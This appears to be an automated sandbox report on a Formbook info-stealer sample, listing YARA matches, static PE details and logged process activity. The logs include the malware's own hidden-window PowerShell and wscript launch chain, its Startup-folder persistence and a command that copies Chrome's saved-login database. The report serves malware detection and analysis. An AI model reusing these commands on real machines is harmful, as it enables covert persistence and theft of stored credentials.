          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_011E2B28
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_0114EBB0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_011D03DA
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_011DDBD2
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_011E22AE
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_011E2D07
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_01110D20
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_011E1D55
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_01142581
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_011E25DD
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_0112D5E0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_0112841F
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_011DD466
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_011EDFCE
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_011E1FF1
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_011DD616
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_01136E30
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_011E2EF7
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_00662050
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: String function: 0111B150 appears 35 times
          Source: f5cZJ0WC0H.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: f5cZJ0WC0H.exe, 00000001.00000000.234539000.0000000000FA0000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameTesteconnect.exe: vs f5cZJ0WC0H.exe
          Source: f5cZJ0WC0H.exe, 00000001.00000002.246128519.0000000004389000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameStub.dll4 vs f5cZJ0WC0H.exe
          Source: f5cZJ0WC0H.exe, 00000012.00000000.333713010.0000000000290000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameTesteconnect.exe: vs f5cZJ0WC0H.exe
          Source: f5cZJ0WC0H.exe, 00000012.00000002.363047029.00000000006F6000.00000004.00000010.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs f5cZJ0WC0H.exe
          Source: f5cZJ0WC0H.exe, 00000012.00000002.367211386.0000000003749000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameStub.dll4 vs f5cZJ0WC0H.exe
          Source: f5cZJ0WC0H.exe, 00000013.00000002.376654293.0000000000AF6000.00000004.00000010.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs f5cZJ0WC0H.exe
          Source: f5cZJ0WC0H.exe, 00000013.00000002.376445315.00000000006F0000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameTesteconnect.exe: vs f5cZJ0WC0H.exe
          Source: f5cZJ0WC0H.exe, 00000013.00000002.382240548.0000000003989000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameStub.dll4 vs f5cZJ0WC0H.exe
          Source: f5cZJ0WC0H.exe, 00000015.00000002.439007026.000000000120F000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs f5cZJ0WC0H.exe
          Source: f5cZJ0WC0H.exe, 00000015.00000002.437545116.00000000006C0000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameTesteconnect.exe: vs f5cZJ0WC0H.exe
          Source: f5cZJ0WC0H.exe, 00000017.00000002.391999414.000000000133F000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs f5cZJ0WC0H.exe
          Source: f5cZJ0WC0H.exe, 00000017.00000000.372579063.0000000000680000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameTesteconnect.exe: vs f5cZJ0WC0H.exe
          Source: f5cZJ0WC0H.exe, 00000017.00000002.388405020.00000000007F4000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenameHelp.Exej% vs f5cZJ0WC0H.exe
          Source: f5cZJ0WC0H.exe | Binary or memory string: OriginalFilenameTesteconnect.exe: vs f5cZJ0WC0H.exe
          Source: 00000017.00000002.387510478.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000017.00000002.387510478.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000018.00000002.501338482.0000000000500000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000018.00000002.501338482.0000000000500000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000015.00000002.437203324.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000015.00000002.437203324.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.247225412.00000000044D6000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.247225412.00000000044D6000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000018.00000002.504034660.00000000009B0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000018.00000002.504034660.00000000009B0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.246128519.0000000004389000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.246128519.0000000004389000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000015.00000002.438245140.0000000000C70000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000015.00000002.438245140.0000000000C70000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000017.00000002.389389710.0000000001050000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000017.00000002.389389710.0000000001050000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000013.00000002.383962255.0000000003B52000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000013.00000002.383962255.0000000003B52000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000013.00000002.383860155.0000000003AD6000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000013.00000002.383860155.0000000003AD6000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000013.00000002.382240548.0000000003989000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000013.00000002.382240548.0000000003989000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000018.00000002.503765338.0000000000980000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000018.00000002.503765338.0000000000980000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000001F.00000002.439648635.00000000004C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000001F.00000002.439648635.00000000004C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000012.00000002.368138298.0000000003896000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000012.00000002.368138298.0000000003896000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000012.00000002.368427184.0000000003913000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000012.00000002.368427184.0000000003913000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000017.00000002.388561440.0000000000B40000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000017.00000002.388561440.0000000000B40000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000012.00000002.367211386.0000000003749000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000012.00000002.367211386.0000000003749000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000015.00000002.438147328.0000000000C40000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000015.00000002.438147328.0000000000C40000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 23.2.f5cZJ0WC0H.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 23.2.f5cZJ0WC0H.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 21.2.f5cZJ0WC0H.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 21.2.f5cZJ0WC0H.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 21.2.f5cZJ0WC0H.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 21.2.f5cZJ0WC0H.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 23.2.f5cZJ0WC0H.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 23.2.f5cZJ0WC0H.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: f5cZJ0WC0H.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engine | Classification label: mal100.troj.adwa.spyw.evad.winEXE@23/11@5/0
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\Documents\20201127
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6916:120:WilError_01
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4496:120:WilError_01
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exe | File created: C:\Users\user\AppData\Local\Temp\863733.js
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\user\Desktop\desktop.ini
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: unknown | Process created: C:\Users\user\Desktop\f5cZJ0WC0H.exe 'C:\Users\user\Desktop\f5cZJ0WC0H.exe'
          Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c timeout 5 & powershell -command Start-Process -WindowStyle hidden -FilePath 'C:\Windows\System32\wscript.exe' -ArgumentList 'C:\Users\user\AppData\Local\Temp\\863733.js'; Start-Sleep -s 5; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe'
          Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknown | Process created: C:\Windows\SysWOW64\timeout.exe timeout 5
          Source: unknown | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command Start-Process -WindowStyle hidden -FilePath 'C:\Windows\System32\wscript.exe' -ArgumentList 'C:\Users\user\AppData\Local\Temp\\863733.js'; Start-Sleep -s 5; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe'
          Source: unknown | Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\wscript.exe' C:\Users\user\AppData\Local\Temp\\863733.js
          Source: unknown | Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe'
          Source: unknown | Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe'
          Source: unknown | Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe
          Source: unknown | Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe
          Source: unknown | Process created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
          Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
          Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknown | Process created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe
          Source: unknown | Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c timeout 5 & powershell -command Start-Process -WindowStyle hidden -FilePath 'C:\Windows\System32\wscript.exe' -ArgumentList 'C:\Users\user\AppData\Local\Temp\\863733.js'; Start-Sleep -s 5; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe'
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout 5
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command Start-Process -WindowStyle hidden -FilePath 'C:\Windows\System32\wscript.exe' -ArgumentList 'C:\Users\user\AppData\Local\Temp\\863733.js'; Start-Sleep -s 5; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe'
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\wscript.exe' C:\Users\user\AppData\Local\Temp\\863733.js
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe'
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe
          Source: C:\Windows\SysWOW64\help.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
          Source: C:\Windows\SysWOW64\help.exe | File written: C:\Users\user\AppData\Roaming\7-NB1T71\7-Nlogri.ini
          Source: Window Recorder | Window detected: More than 3 window changes detected
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Windows\SysWOW64\help.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
          Source: f5cZJ0WC0H.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: f5cZJ0WC0H.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: f5cZJ0WC0H.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000016.00000000.387796376.0000000006FE0000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: f5cZJ0WC0H.exe, 00000015.00000002.439007026.000000000120F000.00000040.00000001.sdmp, f5cZJ0WC0H.exe, 00000017.00000002.390826703.00000000011AF000.00000040.00000001.sdmp, help.exe, 00000018.00000002.505537240.0000000002CE0000.00000040.00000001.sdmp, ipconfig.exe, 0000001F.00000002.440706619.0000000002E3F000.00000040.00000001.sdmp
